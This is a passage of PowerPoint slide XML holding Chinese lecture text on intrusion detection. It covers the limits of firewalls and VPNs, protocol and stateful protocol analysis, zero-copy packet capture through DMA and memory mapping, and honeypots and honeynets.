                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>流进行重组，是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统的关键技术。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面对这样的网络安全局面，传统的网络安全防护技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例如：网络访问控制技术、数据加密传输等技术却存在一些局限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例如：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防火墙设备，由于处在网络的边界，无法防御来自网络内部的攻击；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>vpn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这样的设备，自身可能存在安全弱点从而成为网络攻击的对象。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>他们都无法防范数据驱动型的攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>虽然严格的访问控制和数据加密策略是保证信息系统安全的基础和前提，但是仅仅只有这样的被动防御策略，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在为复杂信息系统提供安全保障时却显得并不充分，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>怎么办呢？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">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sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议分析技术是在传统模式匹配技术基础上发展起来的一种新的入侵检测技术。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>它充分利用网络协议的高度有序性，从网络数据包的固定位置取值而不是一一进行匹配。然后根据取值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>判断协议和对下一步的动作进行分析。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>由于不必对网络数据包进行逐个的比较，从而大大提高检测入侵检测效率。</a:t>
            </a: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indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>同时，协议状态分析在常规协议分析基础上加入协议状态特性分析，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将一个会话的所有流量作为一个整体来考虑。当流量不是期望值时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>就发出告警。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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rgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议分析技术是在传统模式匹配技术基础上发展起来的一种新的入侵检测技术。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>它充分利用网络协议的高度有序性，从网络数据包的固定位置取值而不是一一进行匹配。然后根据取值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>判断协议和对下一步的动作进行分析。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>由于不必对网络数据包进行逐个的比较，从而大大提高检测入侵检测效率。</a:t>
            </a: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indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>同时，协议状态分析在常规协议分析基础上加入协议状态特性分析，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将一个会话的所有流量作为一个整体来考虑。当流量不是期望值时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>就发出告警。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议分析的优点：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>性能比模式匹配提高了很多，准确性也提高了，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2"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634085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olidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在传统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中，需通过系统调用将网卡中的数据包复制到上层应用系统中，这样会占用系统资源，造成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>性能下降</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>零复制技术的基本思想是在数据包传递过程中，减少数据复制次数，减少系统调用，实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的零参与，彻底消除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在这方面的负载。</a:t>
            </a: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目前零复制采用的主要技术就是：</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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DMA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据传输技术（直接存储器访问）</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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、内存区域映射技术</a:t>
            </a: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endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRP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DMA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>技术将网络数据包直接传递到系统内核预先分配的地址空间中，避免</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的参与；</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将系统内核中存储数据包的内存区域映射到检测程序的应用程序空间，检测程序直接对这块内存进行访问，从而减少系统内核向用户空间的内存复制，同时减少系统调用开销，实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>零复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>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从传统意义上讲，信息安全往往是单纯的防御，主动权掌握在攻击者手中，而蜜罐技术的出现改变了这一切。</a:t>
            </a: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en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>蜜罐：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在外部</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>上的一台计算机上运行没有打上补丁的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，记录进出计算机的所有流量。</a:t>
            </a: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蜜网：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>由采用了各种入侵检测和安全审计技术的蜜罐，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>构成了一个黑客诱捕网络体系架构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin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lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>现代的入侵检测系统采用的蜜罐技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使之成为一个吸引攻击者的陷阱，其主主要目的是收集和分析现有威胁的信息，以便我们能够发现新的攻击工具、确定新的攻击模式、研究攻击者的动机。</a:t>
            </a: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endParaRPr lang="zh-CN" sz="1200" dirty="0">
              <a:latin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kumimoji="0" lang="zh-CN" altLang="en-US" sz="120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蜜罐不仅是一种研究工具，同样有着真正的商业应用价值。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当然，设置蜜罐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
